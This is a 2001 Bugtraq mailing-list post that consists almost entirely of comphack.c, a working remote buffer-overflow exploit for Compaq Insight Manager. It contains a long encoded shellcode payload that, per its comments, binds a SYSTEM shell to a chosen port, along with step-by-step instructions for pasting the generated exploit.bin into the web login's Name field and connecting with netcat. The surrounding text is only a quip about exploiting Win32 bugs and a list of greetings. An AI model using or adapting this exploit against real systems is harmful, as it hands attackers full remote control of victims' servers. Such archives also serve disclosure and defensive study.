Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

comphack - Compaq Insight Manager Remote SYSTEM shell

From: Indigo <indig0 () talk21 com>
Date: 29 Nov 2001 11:54:47 -0000
Mailer: SecurityFocus

I'm running out of Win32 vulnerabilities to exploit 
here...Anyone got any ideas?

Cheers,

Indigo.



/*      comphack.c - Compaq Insight Manager 
overflow exploit by Indigo <indig0 () talk21 com> 2001

        Usage: comphack <victim port>

        This code has been compiled and tested 
on Linux and Win32

        The shellcode spawns a SYSTEM shell on 
the chosen port

        Main shellcode adapted from code written 
by izan () deepzone org

        Greets to:

        Morphsta, Br00t, Macavity, Jacob & 
Monkfish...Not forgetting D-Niderlunds
*/

/* #include <windows.h> uncomment if compiling on 
Win32 */
#include <stdio.h>

int main(int argc, char **argv)
{
                                
unsigned char shellcode[] = 

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77
\xFF\xE1\x03\x10"
"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7
\x31\xC9\xB1\x6F"
"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07
\x31\xDB\xB3\x18"
"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3
\x1D\x01\xDF\x29\x07"
"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07
\xB3\x05\x01\xDF"
"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07
\xB3\x12\x01\xDF"
"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01
\xDF\x29\x07\xB3\x14"
"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3
\x3F\x01\xDF\x29\x07"
"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07
\xB3\x08\x01\xDF"
"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01
\xDF\x29\x07\x66\x81"
"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07
\x47\x47\x47\x47"
"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7
\x5F\x5F\x5F\x5F"
"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2
\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7
\xAD\x5D\x5F\x5F\xD2"
"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35
\x55\xCF\xCF\xCF"
"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09"
"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09\xA0\xCA"
"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09\xD2\xEA\xB2"
"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0
\xCA\x6C\x7A\x1F"
"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2
\xEA\xAA\x7A\x1F"
"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79
\x1F\x5F\xF2\x0F"
"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79
\x1F\x5F\xF2\x0F\xA0\xCA"
"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2
\xE2\x72\x79\x1F\x5F"
"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2
\x6E\x79\x1F\x5F\xF4\xD2"
"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79
\x1F\x5F\x5F\x5F\x5F\x5F"
"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2
\xEA\x66\x79\x1F\x5F"
"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35
\x5F\x35\x4F\x35\x5E"
"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35
\x5F\xA0\xCA\x64"
"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37
\x5F\x5D\x5F\x5F\xA0\xCA"
"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79
\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35
\x5C\x0C\xA0\xCA\x5D\x7A"
"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09"
"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79
\x1F\x5F\xF4\x6C\xBF"
"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2
\x3A\x79\x1F\x5F\x08"
"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x60\x7A\x1F"
"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2
\x3A\x79\x1F\x5F\x5D"
"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79
\x1F\x5F\x5E\x7F\x5F\x5F"
"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79
\x1F\x5F\x5F\x7F\x5F\x5F"
"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79
\x1F\x5F\x08\x0F"
"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6
\x7A\x1F\x5F\xF2\x0F\xA0"
"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10
\x7A\x1F\x5F\xD4\xDA\x3A"
"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2\xEA"
"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55
\x7A\x1F\x5F\x35\x5F\xD2\xE2"
"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38
\xA0\xA0\xA0\x35"
"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2"
"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51
\x7A\x1F\x5F\xD6\xDA\x3E"
"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08
\x0F\xD2\xEA\x0E"
"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2
\x0F\xA0\xCA\x14"
"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35
\x5F\xD4\xDA\x3E"
"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4
\xDA\x0E\x79\x1F"
"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x18\x7A\x1F\x5F"
"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0
\xA0\xD2\xEA\x06"
"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2
\xEA\x02\x79\x1F"
"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0
\xCA\x08\x7A\x1F"
"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\x04\x06\x08"
"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\xF3\xDB"
"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10
\x1C\x14\x6C\x6D"
"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31
\x3B\x5F\x33\x36\x2C"
"\x2B\x3A\x31
\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31
\x3B\x5F"
"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30
\x3C\x34\x3A\x2B"
"\x5F\x14\x1A\x2D\x11\x1A\x13
\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
"\x0F\x36\x2F\x3A\x5F\x18
\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
"\x31\x39\x30
\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30
\x3C\x3A"
"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32
\x3A\x3B\x0F\x36\x2F"
"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30
\x3C\x5F\x2D\x3A"
"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36
\x2B\x3A\x19\x36\x33\x3A"
"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30
\x2C\x3A\x17\x3E\x31\x3B"
"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30
\x3C\x3A\x2C\x2C\x5F\x1C"
"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31
\x7F\x63\x36\x25"
"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71
\x30\x2D\x38\x61"
"\x5D\x5F\x40\x17
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x53
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x
5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x1C\x12\x1B\x71\x1A\x07
\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x56\x56\x56\x56\x56\x00";
                
FILE *fp;
unsigned short int      a_port;

printf ("\nCompaq Insight Manager overflow 
launcher\nby Indigo <indig0 () talk21 com> 2001\n\n");
printf ("This program will generate a binary file called 
exploit.bin\n");
printf ("Connect to the victim using a web browser 
http://victim:2301\n";);
printf ("Next to \'Login Account\', click on 
\'anonymous\'\n");
printf ("Enter some random characters into the 
\'password\' field\n");
printf ("Open exploit.bin in notepad, highlight it then 
copy to the clipboard\n");
printf ("Paste the exploit into the \'Name\' field and 
click OK\n");
printf ("\nLaunch netcat: nc <victim host> <victim 
port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the 
chosen port\n\n");

if (argc != 2)
{
        printf ("Usage: %s <victim port>\n", argv[0]);
        exit (0);
}

a_port = htons(atoi(argv[1]));
a_port^= 0x5f5f;
       
shellcode[1650]= (a_port) & 0xff;
shellcode[1651]= (a_port >> 8) & 0xff;

fp = fopen ("./exploit.bin","wb");

fputs (shellcode,fp);

fclose (fp);
        
return 0;

}
Previous By Date Next
Previous By Thread Next

Current thread: